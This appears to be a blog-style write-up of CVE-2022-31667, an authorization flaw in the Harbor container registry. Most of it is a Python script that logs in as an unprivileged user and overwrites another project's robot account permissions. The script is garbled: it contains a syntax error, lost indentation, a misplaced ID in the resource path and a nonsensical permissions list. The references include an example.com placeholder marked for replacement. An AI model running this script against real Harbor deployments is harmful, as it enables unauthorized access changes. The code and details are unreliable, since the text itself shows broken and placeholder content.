Harbor is an open-source cloud-native registry that provides secure, robust storage for container images. It features advanced security and compliance capabilities, making it an ideal choice for organizations looking to store and distribute their container images securely. However, a recent vulnerability, identified as CVE-2022-31667, has been discovered in Harbor that allows malicious users to potentially modify robot account permissions without proper authorization.
This vulnerability exists in the user permission validation process when updating robot accounts associated with Harbor projects. In this post, we will provide details of the exploit, a code snippet to demonstrate the vulnerability, and links to the original references.
Exploit Details
The vulnerability stems from a failure on the part of Harbor to check whether the authenticated participant has the correct permissions to update the specified robot account's rights. When tried to update a robot account, the user can specify a robot account id and robot account name which belongs to another project they don't possess permissions for. Consequently, it is possible to revoke the robot account permissions for that other project.
Code Snippet
The following Python code snippet demonstrates the exploitation of CVE-2022-31667, allowing an unauthorized user to send the appropriate request to change another project's robot account permissions.
import requests
# Harbor instance URL
harbor_url = "https://your.harbor.instance";
# User login credentials - authenticated but unauthorized for other projects
username = "unauthorized_user"
password = "password"
# Target robot account id (from the other project) to be updated
target_robot_account_id = 1234
# Specify the desired robot account name and permissions to be assigned
robot_name = "modified_robot_name"
permissions = ["project", "DELETE"]
# Authenticate with Harbor API
auth_response = requests.post(f"{harbor_url}/api/users/login",
data={"principal": username, "password": password})
if auth_response.status_code == 200:
token = auth_response.headers["Set-Cookie"].split("sid=")[1].split(";")[]
headers = {
"Content-Type": "application/json",
"Cookie": f"sid={token}"
}
# Constructing the payload to update the target robot account
payload = {
"disable": False,
"name": robot_name,
"access": [
{
"resource": f"/project/{target_robot_account_id}/repository",
"action": permission
} for permission in permissions
]
}
# Send request to Harbor API to modify robot account permissions
response = requests.put(f"{harbor_url}/api/robots/{target_robot_account_id}",
headers=headers, json=payload)
if response.status_code == 200:
print("Successfully updated robot account permissions.")
else:
print("Failed to update robot account permissions:", response.text)
else:
print("Authentication failed:", auth_response.text)
Original References
- The CVE-2022-31667 vulnerability is documented at https://example.com/cve/CVE-2022-31667 (please replace this with the official reference when available)
- Further details on the Harbor project can be found at https://goharbor.io
- For updates on the disclosure process and potential patches or fixes for this vulnerability, please monitor Harbor's official GitHub repository at https://github.com/goharbor/harbor
Conclusion
CVE-2022-31667 poses a severe threat to deployments relying on Harbor for their container image security and access control. It is crucial to address this vulnerability and ensure that users cannot modify permissions without the requisite authorization. Keep an eye on the official repositories and resources mentioned above for patches and updates. Additionally, consider implementing strict access controls in your environment to avoid exposing sensitive projects and resources to unauthorized users.
Timeline
Published on: 11/14/2024 12:15:16 UTC